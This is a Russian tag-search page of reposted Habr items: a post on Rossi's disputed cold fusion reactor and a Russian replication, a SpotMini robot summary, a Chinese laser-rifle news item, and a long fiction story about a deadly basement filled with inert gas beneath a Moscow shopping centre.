Результаты поиска потегуhabr

Дополнительные фильтры
Теги:
habrновый тег
Автор поста
Рейтинг поста:
-∞050100200300400+
Найдено: 148
Сортировка:

Реактор холодного синтеза Росси (воспроизведение эксперимента)
,Реактор познавательный,наука и техника,хабр,энергетика,песочница

Возможно, вы уже читали о реакторе холодного синтеза Андреа Росси. Этот реактор вызывает крайне противоречивые мнения, и очень многие относятся к нему как к мошенничеству, которое не заслуживает серьезного рассмотрения и вообще противоречит основным законам ядерной физики. Тем не менее, появляются все новые свидетельства, что данный реактор действительно работает. И вот теперь работающий реактор из России…
Но сначала чуть-чуть истории. Впервые я услышал об Андреа Росси и его реакторе в январе 2011 года, когда он провел первую открытую демонстрацию своего устройства (E-Cat от английского energy catalyzer) в университете Болоньи. С тех пор я слежу за этой темой. Андреа Росси не раскрывает деталей внутреннего устройства реактора, поскольку оно является коммерческой тайной. В настоящее время все права на данное устройство принадлежат американской компании Industrial Heat, где Росси возглавляет всю научно-исследовательскую и конструкторскую деятельность в отношении реактора. 
Существуют низкотемпературная (E-Cat) и высокотемпературная (Hot Cat) версии реактора. Первая для температур примерно 100-200 °C, вторая для температур порядка 800-1400 °C. В настоящее время компания продала низкотемпературный реактор на 1МВт неназванному заказчику для коммерческого использования и, в частности, на этом реакторе Industrial Heat проводит тестирование и отладку для того, чтобы начать полномасштабное промышленное производство подобных энергетических блоков. Как заявляет Андреа Росси, реактор работает главным образом за счет реакции между никелем и водородом, в ходе которой происходит трансмутация изотопов никеля с выделением большого количества тепла. Т.е. одни изотопы никеля переходят в другие изотопы. Тем не менее был проведен ряд независимых испытаний, наиболее информативным из которых было испытание высокотемпературной версии реактора в швейцарском городе Лугано. Об этом испытании уже писали здесь.
27 декабря на сайте E-Cat World была опубликована статья о независимом воспроизведении реактора Росси в России. В этой же статье содержится ссылка на доклад «Исследование аналога высокотемпературного теплогенератора Росси» физика Пархомова Александра Георгиевича. Доклад подготовлен для всероссийского физического семинара «Холодный ядерный синтез и шаровая молния», который прошел 25 сентября 2014 года в Российском университете дружбы народов. 
В докладе автор представил свою версию реактора Росси, данные по его внутреннему устройству и проведенным испытаниям. Главным вывод: реактор действительно выделяет больше энергии, чем потребляет. Отношение выделенного тепла к потребленной энергии составило 2.58. Более того, около 8 минут реактор проработал вообще без подачи входной мощности, после того, как питающий провод перегорел, производя при этом около киловата тепловой мощности на выходе.
 

Презентация робота SpotMini от Boston Dynamics




Это видео где Marc Raibert основатель Boston Dynamics рассказывает про роботов: BigDog, Spot, SpotMini, Atlas. На основании этого видео и других видео где выступал Marc, я опишу кратко технологии роботов и дальнейшие планы компании.

Marc Raibert основал компанию Boston Dynamics 25 лет назад, но она еще не выпускала своих роботов в производство. Объясняет это основатель тем что компания работала все это время на опережающее развитие за горизонтом возможностей текущей робототехники. Тем не менее в своих роботах компания достигла того уровня когда стало возможным сделать небольшого электрического робота на четырех ногах способного автономно передвигаться по пересеченной местности и зданиях. Поэтому они собираются начать массовое производство робота SpotMini в середине 2019 года в количестве 1000 штук в год.

На данный момент уже 10 роботов испытывают потенциальные заказчики, еще 100 будет поставлено в течении года для тестов.



Робот будет продаваться как платформа на которую можно установить руку. У него есть API с помощью которого сторонние разработчики смогут писать свои приложения и пользоваться основным функционалом робота. В видео есть несколько демонстраций таких приложений.

Подразумевается что Boston Dinamics заложила базовый функционал в робота и оператору робота или стороннему разработчику можно отдавать только высокоуровневые команды типа иди туда с такой то скоростью, подай банку с колой.

Marc заявляет что робот может действовать рядом с человеком и по сути является коллаборативным, что он обосновывает в видео тем что робот весит всего лишь 27 килограмм и по этому не может причинить вреда человеку.



SpotMini умеет обнаруживать банку с колой, захватывать и переносить в другое место или отдавать людям. На фото выше как раз пример приложения для робота которое выполняет такую задачу.



Также интересен рассказ про технологии примененные в роботе Atlas. Первоначальный вес робота удалось снизить с 170 килограмм до 75 при той же энерговооруженности. При этом робот стал гораздо проворнее и способнее. Этого удалось добиться за счет новых методов конструирования и 3d печати. В видео показывается нога робота напечатанная на принтере, которая весит в разы меньше при той же прочности.

Особенно стоит отметить про энергетическую установку. В видео Marc говорит что им удалось уместить двигатель внутреннего сгорания, насос подачи топлива, фильтры и карбюратор с аккумулятором в живот робота, при этом вес всей этой конструкции составил 5 килограмм при мощности 5 киловатт. Опять же он говорит что это было бы не возможно без передовых методов проектирования и 3D печати.



В другом видео он рассказывает про робота Handle, он планируется как логистический робот способный переносить грузы быстро на дальние расстояния, так как вместо ног у него колеса.

Небольшой реверс инжиниринг от меня:

,робототехника,Разработка робототехники,Программирование микроконтроллеров,Презентации,Обработка изображений,видео,video,habrahabr,SpotMini,Boston Dynamics,длиннопост,geek,Прикольные гаджеты. Научный, инженерный и  айтишный юмор,AmigoRRR,мопед не мой


В видео Marc Raibert говорит что в роботе используется 5 модулей камер, две спереди и по одной слева, справа и сзади. От лазерного лидара они по видимому в коммерческой версии отказались. На фото видно что модуль камер какой то не стандартный, всего можно разглядеть 5 камер в модуле, возможно несколько из них это инфракрасная камера с приемником. Также видно что две камеры мелкие и как бы под углом друг к другу. Если кто то знает что это за модуль напишите в комментариях. Из всего этого можно сделать вывод что робот обходиться только стерео камерами, возможно с инфракрасной камерой глубины. Алгоритм позиционирования и локализации скорее всего визуальный SLAM, какой не понятно. Вообще компания Boston Dinamics довольно закрыта и мало рассказывает о программном обеспечении своих роботов, но на форумах люди в ней работавшие пишут что у них свой проприетарный код, в основном на C++ и немного на Python. Есть упоминание о использовании Drake. Возможно в роботе Atlas на соревнованиях частично использовался ROS.

По механике и расчету движения конечностей роботов, исследования Marc Raibertа тянуться со времен основания им лаборатории по движению ног в 1980 году и написанием книги Legged Robots that Balance в 1986 году. Также из исследований MIT которые я описывал в прошлой статье по слепому роботу гепарду можно сделать вывод что похожие методы используются и в SpotMini так как Marc Raibert был профессором в MIT.

По сути это будет первый достаточно функциональный и сложный робот который будет повседневно использоваться рядом с человеком. Пока он умеет только хватать банку с колой и женские сумки, то ли еще будет: )

Китайцы представили лазерное ружье с дальнобойностью почти километр



Ученые из Сианьского института оптики и точной механики при Китайской академии наук анонсировали новую разработку — лазерное ружье ZKZM-500. По словам разработчиков, хотя оружие и относится к классу «нелетального», но энергии луча достаточно, чтобы вызвать мгновенное обугливание кожи и тканей. Всего лишь десять лет назад такая винтовка была лишь достоянием голливудских студий, а теперь это вполне реальное оружие. Инженеры, разрабатывавшие ружье, говорят, что луч без проблем поразит человека сквозь одежду. Более того, если ткань, из которой пошита одежда, легко воспламеняется, то человек в этой одежде может превратиться в живой факел. 

Ружье спроектировано таким образом, чтобы его можно было использовать в пешем походе, прикрепить к автомобилю или летательному аппарату. Вес ружья составляет 3 кг, примерно столько же весит автомат Калашникова АК-47. Сейчас китайцы решают вопрос о начале массового производства лазерного вооружения и предоставления его антитеррористическим командам и специальным подразделениям полиции.

Зарядов у винтовки будет более, чем достаточно. Ее аккумулятора (обычный перезаряжаемый Li-ion) хватит на 1000 выстрелов по 2 секунды каждый. Дальнобойность — 800 м. Прототип винтовки был построен на основе лазера ZKZM, разработанного ранее Сианьским университетом. Разработчики сейчас ищут партнера, у которого есть лицензия на производство оружия. Стоимость одной винтовки составляет около $15 000.




Отличный комментарий!

Гы, теперь террористы в китае будут косплеить моднячих диско-дэнсеров?
,geek,Прикольные гаджеты. Научный, инженерный и  айтишный юмор,лазер,китайцы,оружие,ружье,habrahabr

Ветка обсуждений по теме: "Фермер из Курганской области собирался шпионить за коровой с помощью китайского GPS-трекера. Сотрудники ФСБ задержали его около почты с посылкой в руках."




Ссылка на комментарий.

,Подвал смерти,Интересные истории,время охуительных историй,хабр,научная фантастика,песочница

Подвал смерти

Эту историю я спионерил и прнс сюда с Хабра.





Затухающий костёр освещал только крохотный пятачок пляжа. Сидящий напротив огня кот, как и я, смотрел на огонь, сияя плошками отражающих свет глаз. Было в этой сцене что-то по домашнему уютное.
Я налил себе кофе, и, сев на складной стульчик, похлопал по колену, приглашая Беляша присоединиться. Его пучешарое величество соизволило принять приглашение. Почти невидимая в темноте Никсель полулежала на туристической пенке, но не спала. Конечно, уснешь тут.
— Настало время удивительных историй? — Спросил я. — Раз всё равно не спим.
Никсель промолчала. Беляш вертелся у меня на коленях, устраиваясь поудобней.
— Ну, раз возражений нет, начну: У меня неподалеку от дома работает офисный центр, у которого под автостоянкой расположен подвал смерти.
— Это как? — тихонько спросила девушка.
— Подвал, в который люди заходят и пропадают. Серьезно. Там у них за 30 лет российской независимости человек тридцать пропало. По человеку в год, таксказать.

Расскажу лучше по порядку: – в самом начале СССР построили на окраине Москвы заводик спецсплавов. При союзе он существовал тихо и спокойно, выпуская какую-то ерунду для народного хозяйства.
А в конце перестройки там директор помер. Старик уже был. А на дворе перестройка. Гласность. Ускорение. Коллектив завода – в духе времени, устроил выборы директора завода. Руководство отрасли не протестовало – им уже всё равно было. Вот так и стал один из молодых специалистов, сразу после института – директором. Почему? Говорил красиво, вот потому что. В дела особо не вникал – да ему и не нужно было. Спецсплавы к тому времени уже никому были не нужны.
Потом девяностые пришли. Наш директор, извернулся и приватизировал завод в одну будку. Протоколы подделал, ваучеры с коллектива собрал, выдав взамен ничего не значащие бумаги – и стал, в конце всех махинаций, единоличным владельцем завода. Обычная история – у всех наших миллиардеров, если копнуть, в биографии что-то подобное было.
По началу он, как и положено «гению предпринимательства» просто распродавал завод. По дешевке, естественно – поскольку по-другому не умел. Но, году так в 94, даже до него дошло, что доставшийся ему ресурс не бесконечен. И что надо что мутить.
Выход лежал на поверхности. Превратив заводоуправление в офисный центр, директор получит стабильный источник доходов. Вот тут-то наша история и началась. Само здание заводоуправление было старое – построено при Сталине, планов в архиве толком не сохранилось, так что площади под аренду пришлось обмерять вручную.
Так эту дверь и обнаружили. Стальную. Старую. Что за ней находится – никто в заводоуправлении не знал. Может старые работники и знали, так их уже пару лет, как всех уволили. Понятно, что дверь идет в подвал – но вот что в нем?
Дверь было решено открыть. Рабочих на заводе, к тому времени не было. Так что спиливал замки болгаркой, бывший главный инженер. Он первый и пропал. Взял фонарик, сказал, что спускается в подвал и пропал. С концами.
Директор его подождал пару часиков, и секретаршу за ним послал.
— Она тоже пропала? — Взволнованно спросила Никсель.
— Конечно нет. Она просто не пошла. Не за тем она в секретари пошла, чтоб по подвалам лазать. Спустилась на пару ступенек и вернулась, сказав, что там темно и страшно. Послали электрика. А вот он – как раз пропал.
— Я что-то одно не пойму, почему директор сам не спустился?
— Так я же говорю – это был новый русский директор. Он даже в туалет бы сам не ходил, если бы была возможность туда секретаршу послать.
Так что в тот день в подвал больше никто не пошел. Подчиненные кончились.
Жена главного инженера вечером звонила. Мужа искала. Директор привычно соврал – что он не при делах, муж её домой ушел. Жена электрика не звонила. Электрик один жил. Его просто через пару лет без вести пропавшим суд признал, комнату в коммуналке соседи себе забрали, а вещи на улицу выбросили.
— А почему директор просто МЧС не вызвал?
— Ага. Счасз. Забыла, зачем он площади обмерял? Кредит под залог здания взять хотел. Деньги были очень нужны, чтоб заводоуправление под офисный центр отделать. Так что любое разбирательство с МЧС ему было не в тему. А вдруг что опасное да ядовитое найдут и здание вообще сносить придется?
— И что, пропавших никто не искал? — Спросила жующая что-то в темноте Никсель.
— Конечно нет. На дворе стояли благословенные девяностые. В милиции пропавших без вести даже учитывать не успевали, не то, что искать. Родня инженера согласилась, с подачи директора, что их отца и мужа украли — чтоб выкуп потребовать. Затихло всё, в общем.
Директор – кредит взял, ремонт провел, в офисный центр фирмы въехали. На дверь повесили новый замок, с ключом у директора и какое-то время подвал никак себя не проявлял. А что двое рабочих, пока офисный центр строили, пропали – так домой может быть уехали.

Потом с подвалом бандиты столкнулись. Сначала группировка качков-рэкетиров подкатила к нашему директору. У него, конечно, подвязки в верхах были. Откупные кому надо заносил. Но, фишка в том, что качки были здесь и сейчас – а покровители у себя в МВД и завтра.
Качки хотели денег от аренды. Но, вот так вот сразу подкатить они не решались, поэтому, для начала потребовали, чтоб директор, в знак помощи слабым и больным спортсменам – разрешил им устроить в подвале качалочку. Не забывай – речь идет о девяностых.
Директор начал что-то мямлить, темнить, разводить руками…. В общем – повел себя с точки зрения бандитов ужасно подозрительно. И чем больше бандиты давили, тем больше директор мямлил.
Уж не знаю, какое сокровище, по мнению банды, директор в подвале хранил. Может золото КПСС, может библиотеку Ивана Грозного. В общем – раскололи бандиты директора. И тут-же все полегли. На пол. От смеха. Вся эта история с подвалом смерти показалась им дурацким розыгрышем. Как ты понимаешь, меня там не было, но я хорошо представляю эту ситуацию. Здоровые, мордастые братки и тоненький, худенький директор на гнущихся ножках.
В общем, отсмеялись они и пошли в подвал. Все вместе. Директора с собой повели, чтоб он им дверь открыл. Ну, и заодно, чтоб убедился – что в самое страшное в мире – это они, а не неизвестное нечто, что сидит в подвале.
Ушлый директор сначала немного отстал, потом, когда двери в подвал открыл, вежливо пропустил братков вперед, а на лестнице вниз, он сначала на пару ступенек отстал, потом еще больше, а потом и вовсе удрал.
Так и выжил. Потому что остальные сгинули. Все четверо.
Директор, потом рассказывал, что перед тем, как сбежать он увидел внизу, в конце лестницы, еще одну металлическую дверь. Первый бандит её открыл и удивленно присвистнул.
— И что там было? — спросила заинтересованная Никсель.
— Тьма. За дверью внизу лестницы плескалась тьма, которая братков и поглотила.
— Не поняла.
— Никто не понял. Директор эту тьму видел мельком, удирая вверх по лестнице на четвереньках – споткнулся бедняжка, когда стратегически отступал.
Зато потом, добравшись до двери в подвал и заперев её, он сумел прислушаться. Сначала он еще слышал голоса, потом удивленные возгласы, потом скрежет как, будто что-то металлическое протащили, звуки падения… А потом низкий булькающий рев, словно что-то огромное кричит. Потом пара пистолетных выстрелов и тишина.
— И что? Братков тоже никто не искал?
— Братков как раз искали. Другие братки. Диктор придумал хитрую схему – оставил на столе в своём кабинете ключи, со схемой как найти нужную дверь и уехал в Италию. Переговоры по телефону вёл – по телефону и из Италии он был очень смелый. Прибывающим на поиски товарищей партиям братков он рассказывал, что их коллеги ушли в подвал и не вернулись, выслушивал дежурные угрозы и, выждав положенный срок и изобразив испуг, сообщал где ключи от подвала лежат.
Оставшаяся в России секретарша, через пару часов заходила в здание, закрывала подвал и возвращала ключи на место. Братки приезжали сначала партиями, по двое-трое, потом небольшими группами. В последний раз их вообще целая толпа приехала. Человек десять, с автоматами и в бронежилетах. Впрочем, на итог это не повлияло.

Все сгинули.
Офисный центр при этом работал в обычном режиме. В те годы гуляющим по этажам в поисках владельца бандитам никого было не удивить. Люди выживали как могли – а одном из условий выживания было игнорирование чужих разборок.
Но вернемся к нашим качкам. Их группировку, кстати, потеря стольких бойцов сильно обескровила, да и в итоге подкосила. Остатки их банды перебили чечены, которые в МСК как раз в силу входили.

Так что в следующий раз к Директору сборщик дани уже от чеченцев пришел. Прямо на его виллу в Италии. Диктор заученно отбарабанил свой текст, действуя по отработанной схеме, но неожиданно был услышан.
И тут дело не в том, что чечены были умнее группировки качков – кто угодно, включая Беляша, умнее бандитов-качков, а в том, что чечены – более молодой народ. Дети гор, не так давно спустившиеся с этих самых гор – и еще помнящие то время, когда все страшные сказки – про чудовищ, демонов и драконов — были не сказками, а документальной хроникой текущих событий.
Так что чечены просто объявили, что подвал «харам» и не предпринимали никаких попыток туда спуститься. Директор платил им дань, а больше их ничего не интересовало. Любопытства у них не было никакого.
Так эта история была законсервирована еще лет на пятнадцать.

Но всему хорошему приходит конец. Пришел он и стабильности. После кризиса 2008 года, нашему Директору стало остро не хватать денег. Часть арендаторов съехала, часть обанкротилась. Директор – попытался компенсировать потерю денег тем, что поднял стоимость аренды для оставшихся арендаторов. После чего разбежались и они – благо, в кризисной Москве в тот год много офисов опустело.
В общем, нужно было что-то менять. Благо, ситуация способствовала – над российскими деньгами, которые наша элита хранила на западе нависла угроза раскулачивания. И пугливые толстосумы начали вкладывать деньги не только в швейцарские банки, но и в Российскую недвижимость.
К Директору подослали ходоков, с предложением снести его, ничем не примечательный, кроме расположения, офисный центр, и построить центр торговый. Что должно было – в перспективе – быть более выгодным вложением капитала. (Ибо вектор развития показывал – что с каждым годом москвичи всё меньше работают и всё больше потребляют).
Сидящий на хлебе и воде (в смысле, вынужденный продать яхту) Директор был только за. Вот только в сделке была некоторая шероховатость. Дело в том, что Инвестор – собирался рассчитаться за землю не деньгами – а торговыми площадями в новом торговом центре.
Понимаешь, куда я клоню? Директор не мог получить деньги и спрятаться в Италии, позволив новому собственнику самому разбираться с нехорошим подвалом. Подвал оставался – частично, конечно, в том числе и его собственностью. И его головной болью.
Так что Директор, скрипя сердцем, рассказал о проблеме Инвестору. Сразу после заключения сделки – идиотом он не был. Впрочем, оказалось, что Инвестор о проблеме знал. Служба безопасности постаралась. Но – большого значения не придавал. В те годы в Москве у любого объекта недвижимости были подобные скелеты в шкафу – треть была внесена в реестр недвижимости за взятки, треть приватизирована по подложным документам. На этом фоне здание с подвалом, в котором пропало тридцать человек – право, бриллиант почти чистой воды.
Оставалось решить – что с подвалом делать. Сразу запускать строителей – было опасно. Строить ТЦ должны были турки, и, если их технический персонал начнет бесследно пропадать в подвале – выйдет конфуз.
Попробовали решить проблему силами службы безопасности – наняли на работу охранником украинского гастарбайтера и попросили проверить подвал. Гастарбайтер пропал. Сидящее в подвале нечто за пятнадцать лет никуда не делось.
После этого служба безопасности самоустранилась. У охранников, что работают не первый год, зад приобретает особую чувствительность к неприятностям – как только в воздухе начинает пахнуть жареным, охранники, как крысы, первыми бегут с корабля.
Оставшись на бобах, Директор с Инвестором, подошли к делу творчески. Они обратились к проектировщику, с просьбой изменить проект строящегося офисного центра таким образом, чтоб подвал здания остался нетронутым и неизменным. Проектировщик, дождавшись ухода заказчиков, долго матерился и вертел пальцем у виска, но сделал как просили. Он уже давно привык к необычным запросам.
Потом здание ТЦ было построено. Подвал, когда здание разбирали, строительным мусором немного засыпало, но больше никаких изменений не было. На плане подвал был обозначен как «Этаж – 3», выше его организовали парковку для автомобилей клиентов, потом шли три этажа собственно торгового центра.

Лет пять после этого дела шли нормально и о подвале было не слышно. На подземной стоянке иногда находили брошенные тачки, водители и пассажиры которых куда-то делись, но такое и в других торговых центрах случалось. Беда подкралась – откуда не ждали. Когда президент обвалил рубль, проживающие в Италии Директор и Инвестор были поставлены перед фактом – что их, исчисляемые в долларах доходы стали вдвое меньше. Директор было решил поднять для оставшихся арендаторов стоимость аренды в три раза (чтоб компенсировать потери от обвала рубля и бегства части арендаторов) но более умный Инвестор отговорил его от этого самоубийственного поступка. Вместо этого они сменили управляющего ТЦ. До этого, у них управляющим работала девочка их круга – то ли дочка какого-то генерала, то ли любовница… в общем, совершенно безмозглое существо, у которого хватало умишка только собирать арендную плату. Не всю и не вовремя. 
Вместо неё управляющим был назначен истинный сухопутный крокодил – молодой армянин Ашот. Славен он был тем, что мог выдавить полстакана водки даже из пустой бутылки.
И он принялся давить соки из торгового центра. Да так лихо – что любо дорого смотреть. Для начала – он установил на здании глушилки интернета, чтоб арендаторы не подключались к дешевому интернету от сотовых операторов, а втридорога покупали интернет от владельцев ТЦ. Потом сделал все туалеты в ТЦ платными. Даже для персонала ТЦ.
После чего обратил свой взор к подвалу.
Нашел ключи, спустился. Не в сам подвал смерти, конечно. А на заваленный мусором минус второй этаж, в одном из коридоров которого и была дверь в подвал смерти.
Запертая, конечно. Это управляющего и спасло.
Пока он ходил и искал – либо ключи, либо узбека с болгаркой – охрана сориентировалась и доложила владельцам ТЦ о сложившейся ситуации. Владельцы всполошились и запретили управляющему в подвал свой нос совать. Ведь страшно подумать, что будет – если управляющий пропадет. Его же вся московская диаспора, все два миллиона человек искать будут.
Но, тут нашла коса на камень. Я уже говорил, что управляющий был сухопутным крокодилом? В общем, так или иначе – он разузнал всю историю. И впервые – во всей этой истории, предпринял попытку научного исследования феномена. (Он сидел на проценте от собранных с ТЦ средств, а пустующий подвал можно было выгодно сдать).
У электронщика, который спаял им систему глушилок интернета, он заказал исследовательский дрон на колесиках. Мобильную платформу с камерой, фонариком и управлением через хвост из проводов. Чтоб удаленно исследовать подвал, ничем не рискуя.
Электронщик, как и следовало ожидать, был силён в электронике, а не в механике.
Механическую часть этого гроба на колесиках он заказал своему знакомому. А этим эйнштейном был Альберт Эйнштейн, — сказал я, привстав и откланявшись.
В смысле — механическую часть отдали мне. На проектирование и сборку. Ничего ни мне, ни электронщику о назначении устройства, понятное дело, не сказали. Да мы и не спрашивали. Мы его собрали, получили оплату и забыли.
Ну, как забыли… Управляющий через день к нам опять приперся и потребовал деньги взад.
Устройство, мол, не сработало. Устройство выпустили на лестнице, оно спустилось по ступенькам, добросовестно всё снимая, доехало до металлической двери внизу лестницы, в которое и уперлось рогом. Фигурально выражаясь. Открывать двери оно не умело. Скажу больше – у него даже не было ручек.
Но, тут – как говорится, нашла коса на камень.
Если электронщика Вандера управляющий ТЦ зашугал, то со мной у него облом вышел. Меня так и зовут, в определенных кругах: «Где сядешь там и слезешь». Орать на меня бесполезно – я и сам орать умею. И с хамоватыми заказчиками общаюсь не первый день – у меня на руках было задание, что должно было уметь делать устройство. И открытие дверей в нем не значилось.
Конечно, я могу переделать устройство – добавив опцию «Открытия дверей» — но за отдельные деньги и неделю времени. Это задача не из простых. В общем, так я и сказал.
Заказчик согласился. Я тут-же потребовал предоплату – в размере полной стоимости переделки. Раз заказчик показал себя настолько ушлым, то надеяться на честный расчет было бессмысленно. Заказчик предсказуемо отказался, и мы разошлись, как в море корабли.
И как только он ушел, мы с Вандером переглянулись – и бросились писать Анархисту. В смысле, третьему участнику нашего трио, который программную начинку для Гроба На Колесиках писал. Он всегда, в свои самописные поделки черные ходы встраивает. На случай, если заказчик откажется оплачивать. Или из любопытства. Или из природной вредности.
Уж больно нас заинтересовала поставленная перед нашим дроном исследователем. То есть с самого начала мы догадывались, что дело тут нечистое – но выдвигали более разумные версии. Я, к примеру, считал, что наш Гробик правительство России за миллиард рублей заказало у института Российских Уникальных Роботов, институт заказал за 100 миллионов у смежников, смежники заказали за 10 миллионов у прикормленной фирмы, те нашли на Авито подходящую по профилю конторку, чей директор должен был заказать дрона у нас за 100 тысяч, но лично украл две трети. Потом наш дрон будет с большой помпой назван «РОБОТОМ ИССЛЕДОВАТЕЛЕМ КУКУСИМЫ» и очередной Рогозин вручит его послу Японии. Вандер же считал, что дрон будет исследовать вентиляцию женской раздевалки какого-нибудь фитнес центра.
— Господи, Вандер, – голые женщины! — говорил я. — Эка невидаль. Кому нынче нужны голые женщины? Полчаса пройди ножками от метро – и ты на пляже в Серебряном Бору. Там этих голых женщин, конечно, много меньше, чем мужчин – но тоже с избытком хватает. Смотри – не хочу. Это я тебе как очевидец говорю. На что Вандер отвечал, что мужчине нужна не просто голая женщина, а какая-то конкретная голая женщина. Которая, очевидно, не порадовала цветами своей промежности какого-то конкретно запавшего на неё мужчину.
Так мы вяло переругивались, пока видео через вайфай скачивалось.
Увиденное нам не понравилось. Сильно.
Запись начиналась с того, что наш заказчик, включив камеру, долго вертел дрона в руках, гортанно матерясь. (Сиё действо происходило заваленном строительным мусором подвале) и бодро удрал, передав робота нескольким охранникам в белых малярных комбинезонах поверх формы.
Потом отчаянно мандражирующие охранники, с огромными предосторожностями, открыли банальную, покрашенную салатовой краской металлическую дверь, и Гробик въехал туда, оказавшись на небольшой лестничной площадке.
Самой обычной, советской лестничной площадке. Заваленной пыльным мусором – транспарантами, кадками с засохшими цветами, коробками с папками. Освещения – конечно не было, но наш гроб на колёсиках был сделан на совесть – и тут же включил мощные бестеневые лампы. Дверь в это время, судя по кряхтению и царапающим звукам, подпирали чем-то тяжелым.
Потом дрон, повинуясь командам с пульта, бодро съехал вниз по ступенькам. Внизу его ждала еще одна металлическая дверь, стальная, массивная, как у противоатомного убежища, снабженная варварским механизмом самозахлопывания из ржавой пудовой гири, подвешенной на стальном тросике, пропущенном через систему блоков.
Мы с Вандером одновременно оба протянули руки к клавиатуре ноута, поставив видео на паузу. После чего принялись с возмущенными воплями тыкать пальцами в экран. Вандера удивил лежащий на полу, в пыли, стоящий как хороший автомобиль автоматический пистолет Стечкина, а меня удивила странная конструкция дверных засовов – они были установлены так, чтоб запирать бомбоубежище снаружи. Что довольно глупо. Мы ведь закрываемся в бомбоубежище, а не запираем сидящих в нем людей, не так ли?
Потом мы переглянулись. «Это какая-то сталкериана», напечатал в аське наблюдающий за нами через камеру в ноутбуке Анархист, словно подведя итог нашего молчания. «Дальше можете не смотреть – дрон будет с полчаса ездить вокруг и около двери, видимо надеясь, что её откроют, а потом его вытащили за хвост назад».
— А потом Управляющий заказал у тебя дроида с руками? — спросила Никсель. Было видно, что история её заинтересовала и немного напугала – она, словно черепашка, втянула под плед руки и ноги.
— Нет. Управляющего я больше не видел. Историю подвала рассказал нам Анархист. Он взломал аккаунты у Директора и Инвестора и прочитал их переписку.
— И что, Управляющий так просто успокоился?
— Не надо недооценивать силу человеческой жадности. Дроид с руками показался Управляющему слишком дорогим, и он просто послал туда одного из своих должников, с Гробом на Колесиках в руках. Это видео мы получили сильно позже.
— И что, что там было?
— Практически ничего. Видно, как человек в противогазе спускается по лестнице, потом с трудом открывает металлическую дверь, за которой расположено огромное пустое помещение с колоннами. Пол помещения расположен ниже чем дверь, от которой, отходит небольшой металлический мостик без перил, но со ступенями вниз.
Человек наклоняется, чтоб поставить дрон на мостик, и падает с мостков вбок. Неожиданно. Ничего в его поведении не предвещало такого исхода. Через секунду за ним с мостка слетает дрон – мужик не успел выложить запас свернутого кольцами кабеля управления дроидом, и утянул его за собой. Еще через секунду трансляция с дрона прервалась. То ли кабель лопнул, то ли дрон был поврежден. В этот момент, там кто-то закричал.
— Должник? — спросила Никсель.
— Сама послушай, — сказал я, передавая Никсель телефон. — Я запись сохранил.
В прозвучавшем в тишине басовом реве, казалось, не было ничего человеческого. И это не был бессмысленный крик животного – казалось, что если вслушаться, то можно различить слова. Так мог кричать убиваемый в компьютерной игрушке Дьябло. Вот только это была не игра.
— А видео? Что на видео было? — Спросила заметно напуганная Никсель. — неужели, дрон так ничего и не заснял?
— Почти ничего. Видишь ли, он был рассчитан на самостоятельную работу, а не на путешествие на руках у вынужденного камикадзе. Он так дрон к себе прижимал, что лампы закрыл. Так что у нас получились меньше секунды видео, да и то – практически чёрное, с помехами и артефактами.
— И что, что на них?
— Видно совсем немного. На отдельных кадрах можно заметить, что в помещении витает легкая дымка. Выглядит как легкий туман, стелящийся по дну. Как затекающий в помещение ледяной воздух. Потом, когда дрон стянули с мостков в это нечто, он успел передать еще пару кадров. Тоже не особо четких…
— Ну, ну, не тяни…говори, что там было, — перебила меня Никсель. Я, выдерживая драматическую паузу, взял в руки кружку и сделал глубокий глоток горячего кофе.
— Мертвые люди. Множество мертвых людей. Сваленные кучами, прямо под металлическими мостками. Не скелеты, нет – тела, почти без признаков разложения, только неестественного, серого цвета. Полагаю, там лежат все, кто спускался в подвал за последнею четверть века.
— Это фома, — благоговейным шёпотом сказала Никсель. Стихийное проклятье, высасывающее жизнь из входящих в подвал людей. Я об нём в «Житии Моём» Сыромятниковой читала.
— Ага, сказал я. Четыре раза Фома и один Ерёма. Если бы в нашем мире работали проклятья, то это был бы совсем другой, более чистый и прекрасный мир.

Газ это был. Тяжелый и удушающий.

Завод ведь спецсплавов был, не забыла? В подвале они хранили используемые при работе благородные газы. Криптон и ксенон. Эта сладкая парочка тяжелее воздуха, так что если какой из баллонов дал течь, то вытекший газ будет стелиться по полу, как жидкость. И ими, без труда можно задохнуться. Для начала их вдыхание вызывает наркотический эффект, потом анестезирующий, потом удушающий, потом судорожный и потом смерть от недостатка кислорода. Люди входили в подвал, как в ловушку, вдыхали газ и падали с мостков вниз, на дно резервуара. По одиночке и партиями.
— А крик? Я же сама слышала, — человек так кричать не может.
— В обычных условия нет. Вот только условия там были необычные. Заполнение тяжелыми газами лёгких и выдыхание при разговоре приводит к значительному понижению тембра голоса. В общем, тот же эффект, что при вдыхании гелия, только наоборот.

— И это всё? Вся тайна? Протекающий баллон с инертным газом?
— … и капитализм. Без этого ингредиента ловушка бы не сработала.
— Вот только не надо мне тут нагнетать. Такое и при коммунистах было. Я читала.
— Читала она, — сказал я обращаясь к Беляшу, который спал у меня на коленях, пока я рассказывал эту историю. Проснувшийся кот с хрустом вытянулся в струну, и вновь свернулся клубком, закрыв глазки и ушки лапками, всем своим видом показывая что не хочет участвовать в дискуссии.
— Не уходи от ответа. Общественный строй не убивает сам по себе, в любой проблеме всегда виноваты конкретные люди. Вот ты, почему не заявил в полицию об убийстве?
— О каком убийстве?
— Как минимум – должника и охранника с Украины. Их отправили на верную смерть.
— А как ты докажешь это? Как не верти – никто их в зал с газом не сталкивал. Сами пришли.
— Их отправили на верную смерть, — сказала, как отрезала Никсель. В общем-то я был с ней согласен, поэтому попытался оправдаться.
— Знаешь, почему все супергерои в США в масках геройствуют?
— А это здесь при чем?
— А это здесь при том, что США при капитализме дольше нас живут. И народ понимает, что герой, имея которого будет известно его богатым врагам, жить будет мучительно, но недолго. Его убьют, чад с домочадцами убьют и дом сожгут. А пепелище солью присыпят – чтоб каждый своё место знал.
— И?
— И что единственное, чего бы я добился, заявив о подвальной гекатомбе, это что меня и Вандера убили бы. Просто и без затей. В этот самый подвал и бросили бы. Чтоб воду не мутили. Торговый центр – это многомиллионный бизнес с которого десятки людей кормятся. И никто не даст тебе вот так просто этот бизнес остановить.
— Но нужно же что-то делать? Нельзя же это так оставлять! — Возмутилась Никсель.
— Извини. Я не Бэтмен. Да и если я решу вдруг стать Бэтменом, у меня до мести этим людям руки не скоро дойдут. Они даже в Топ 100 Гнуснейших Гадин, До Сих Пор Оскверняющих Землю Своим Присутствием не входят. Так, мелкая шушера.
